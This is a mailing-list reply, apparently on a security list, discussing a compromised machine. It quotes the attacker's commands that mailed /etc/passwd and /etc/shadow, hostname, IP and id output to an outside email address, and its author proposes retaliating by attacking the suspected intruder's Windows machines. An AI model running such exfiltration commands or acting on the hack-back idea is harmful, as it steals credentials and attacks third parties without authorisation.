>> 4) The "io" program's purpose was to email my /etc/passwd and
>> /etc/shadow files to an email account ([EMAIL PROTECTED]), along with
>> my hostname, IP address, etc.
>
> Typical.
>
<snip>
>
> Has this been reported to [EMAIL PROTECTED] or
> possibly to [EMAIL PROTECTED]?
>
>> mail -s hhp-pine000 [EMAIL PROTECTED] 2>/dev/null < /etc/passwd
>> echo "`hostname -i` - `id` - `cat /etc/shadow 2>&1`" | mail -s hhp-pine
>> [EMAIL PROTECTED] 2>/dev/null
>
>
Just on a separate but related note, the email address above
picked up in the third message of this thread is of significant
interest to us.
[EMAIL PROTECTED]
In addition, I have a whole pile of IP addresses and traced-routes, many
related to attglobal.net.
We are also receiving a great deal of port scanning and other attention
from these clowns and perhaps it's time to put them out of action -
permanently.
The person above I am sure is a Windoze user - he/she hammers port 137
religiously most nights (my time zone!!) which may not be necessarily a
valid assumption - but it's a start. If they are windoze users it shouldn't
be too difficult to knock them over when they are online.
Regards,
Bruce